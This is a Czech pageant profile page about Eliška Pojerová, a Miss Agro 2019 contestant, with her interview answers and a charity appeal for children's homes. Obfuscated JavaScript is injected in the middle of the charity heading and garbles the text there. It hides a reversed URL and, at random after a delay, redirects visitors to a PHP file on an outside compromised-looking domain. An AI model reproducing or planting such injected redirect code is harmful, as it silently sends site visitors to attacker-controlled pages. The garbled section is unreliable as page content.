Eliška Pojerová

Profil

Fakulta: PEF
Obor: Veřejná správa a regionální rozvoj (VSRRMN)
Ročník: 5.
Věk:
24

Eliška je veselý člověk, který si život užívá naplno. Miluje veškeré vtipy a celkově život bere s humorem. Má plno životních snů, které si postupně plní, i když jde občas hlavou proti zdi. Ráda cestuje a nejraději objevuje krásu přírody. I když je to člověk společenský, má ráda klid a čas od času i samotu. Miluje vaření, ale často se jí to nedaří. Přesto to nevzdává a věří, že jednou bude vařit stejně dobře, jako její babičky. Také neopovrhne žádným sportem – lyžuje, běžkaří a chodí na túry do hor. Má zkrátka ráda vše, co jí život naskytne.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2019?

Pro mě je to velmi složitá otázka. Každá jsme originál a máme plno kladných stránek, které by mohly být právě tím pravým, proč se stát Miss Agro. U mě je to nejspíše má beraní hlava – jsem velmi cílevědomá a Miss bych brala jako výzvu.

Máš nějaký životní vzor? Čím Tě inspiruje?

Životních vzorů mám spoustu. Nejen v mé rodině, ale i ve veřejnosti. Popravdě by měl být každý sám sebou svým životním vzorem, aby byl na sebe pyšný a stal se tudíž vzorem pro ostatní.

Na který předmět na ČZU vzpomínáš nejvíce a proč?

Předmět s názvem Malé a střední podnikání na venkově byl pro mě asi nejzajímavější a vzpomínám na něj s úsměvem. Cílem předmětu bylo vytvořit skupinový projekt a při prezentaci jsme si se spolužačkami uvědomily menší chybu a nemohly jsme se přestat smát. Smíchem jsme nakazily i vyučujícího. Zkouška nakonec dopadla šťastně a úsměv nám zůstal i při odchodu.

Na co se v soutěži Miss Agro těšíš nejvíc?

Těším se na vše, co by mělo být součástí Miss Agro. Nejvíce však na nové přátele, zážitky a zkušenosti.